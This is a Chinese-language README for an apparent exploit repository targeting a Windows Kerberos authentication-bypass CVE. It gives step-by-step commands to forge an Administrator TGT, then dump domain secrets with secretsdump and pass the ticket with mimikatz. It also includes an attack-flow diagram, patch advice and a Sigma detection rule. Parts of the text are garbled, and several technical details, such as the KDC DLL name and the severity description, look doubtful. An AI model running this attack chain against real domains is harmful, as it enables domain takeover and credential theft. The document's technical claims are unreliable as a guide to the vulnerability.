cve-2025-53779-kerberos_bypass_reproduction 的复现
CVSS 评分: 9.8(严重)
状态: 已发现在野积极利用
披露: 微软 2025 年 8 月补丁星期二(零日漏洞)
CVE-2025-53779 是 Microsoft Windows Kerberos 协议实现中的一个严重身份验证绕过漏洞。未经身份验证的攻击者可利用该缺陷完全绕过 Kerberos 身份验证,冒充包括域管理员在内的任何域用户,而无需持有有效凭据或任何加密材料。
微软将该漏洞评为 CVSS 9.8(严重),原因是其攻击复杂度低、无需任何权限、无需用户交互,且可能完全攻陷加入域的系统。
该漏洞位于 Windows 域控制器的 Kerberos 密钥分发中心(KDC)服务(kdsvc.dll)中。具体而言,特权属性证书(PAC)验证例程中的验证逻辑错误,使攻击者能够构造绕过标准身份验证检查的 AS-REQ 或 TGS-REQ 消息。
kdsvc.dll当 Kerberos 消息正文中设置了特定标志时,KDC 无法正确验证 PAC 结构中的 pac-signature-data 字段。通过发送带有被操纵的 PA-PAC-REQUEST padata 类型和伪造的授权数据条目的特制 AS-REQ,攻击者可诱使 KDC 为任何用户主体名称(UPN)颁发票据授予票据(TGT),而无需相应的长期密钥。
该攻击绕过了预身份验证(REQUIRES_PRE_AUTH 标志被有效忽略)并完全跳过 PAC 验证,从而使生成的票据可包含任意组成员身份(例如 Domain Admins、Enterprise Admins)。
在 2025 年 8 月安全更新之前,所有受支持的 Windows Server 版本均受影响:
注意: Windows 客户端版本(Windows 10、Windows 11)不受影响,因为它们不运行 KDC 服务。
impacket 库的 Python 3.8+exploit.py)pip install impacket pycryptodome
或使用随附的 requirements.txt:
pip install -r requirements.txt
使用 Nmap 发现 Kerberos 服务:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
或使用内置的 Kerberos 扫描:
python exploit.py --scan <target-ip>
如果您不知道域用户,可通过 Kerberos AS-REP roasting 或 LDAP 进行枚举:
python exploit.py --enum <target-ip> <domain>
为目标用户生成伪造的 TGT:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
示例:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
漏洞利用脚本会输出 Kirbi 格式的票据文件。使用 Impacket 工具进行验证:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
获得有效 TGT 后,您可以:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"随附的 exploit.py 实现了以下攻击流程:
PA-PAC-REQUEST 字段和被操纵的授权数据的修改版 AS-REQ 消息kdsvc.dll 中的漏洞代码路径Attacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
应用微软 2025 年 8 月补丁星期二更新 — 这是主要修复措施。对应的 KB 请参阅上文受影响版本表。
监控漏洞利用尝试:
网络分段:
启用附加日志记录:
NetworkProvider\Kerberos\Operational)Sigma 规则(无预身份验证的 AS-REQ):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
本仓库仅用于教育和经授权的安全测试目的。在您不拥有或未经明确书面许可测试的系统上未经授权利用 CVE-2025-53779 属于违法行为。作者不对任何误用此信息的行为负责。
本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。
| Windows 版本 | 是否受影响 | 修复更新 |
|---|
| Windows Server 2025 | ✅ 是 | KB5044289 |
| Windows Server 2022 | ✅ 是 | KB5044285 |
| Windows Server 2019 | ✅ 是 | KB5044277 |
| Windows Server 2016 | ✅ 是 | KB5044293 |
| Windows Server 2012 R2 | ✅ 是 | KB5044297 |
| Windows Server 2012 | ✅ 是 | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ 是 | KB5044301 |
| Windows Server 2008 (ESU) | ✅ 是 | KB5044303 |